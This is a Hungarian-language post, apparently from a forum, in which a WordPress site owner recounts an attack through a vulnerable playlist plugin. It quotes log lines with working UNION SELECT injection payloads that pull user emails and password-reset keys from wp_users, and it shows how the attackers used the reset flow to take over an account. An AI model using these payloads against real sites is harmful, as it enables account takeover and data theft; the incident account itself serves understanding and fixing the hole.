Úgy látszik a mysql_real_escape_string nem jött be. Nyomtak egy ilyen get-et:
"GET /wp-content/plugins/plugin/playlist.php?videoid=9%20UNION%20SELECT%201,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11%20FROM%20wp_users-- HTTP/1.1"
Ezzel megszerezték a szükséges e-mailt.
Majd noszogatták kicsit a wordpress-t, hogy küldjön jelszócserét:
"GET /wp-login.php?action=lostpassword HTTP/1.1"
A mysql logban szépen látszik is:
UPDATE `wp_users` SET `user_activation_key` = 'V86U3lRBY4TWbW23vHJF' WHERE `user_login` = 'fisher'
És szaporán ki is olvasták a szükséges kulcsot:
"GET /wp-content/plugins/plugin/playlist.php?videoid=9%20UNION%20SELECT%201,2,3,group_concat(user_login,0x3a,user_activation_key,0x3b),5,6,7,8,9,10,11%20FROM%20wp_users-- HTTP/1.1"
Majd jelszót váltottak, akkor már a wordpressen keresztül.
Leellenőrizem, a mysql_real_escape_stringet a javasoltnak megfelelően adtam meg, de úgy látszik nem használt. Most az indiai fejlesztő megoldását tettem be, ami egy preg_replace, de azt már le akarom cserélni egy $wpdb->prepare megoldásra, de mivel a php-hoz se értek, ezt inkább majd a hétvégén, amikor majd jobban ráérek utánaolvasni.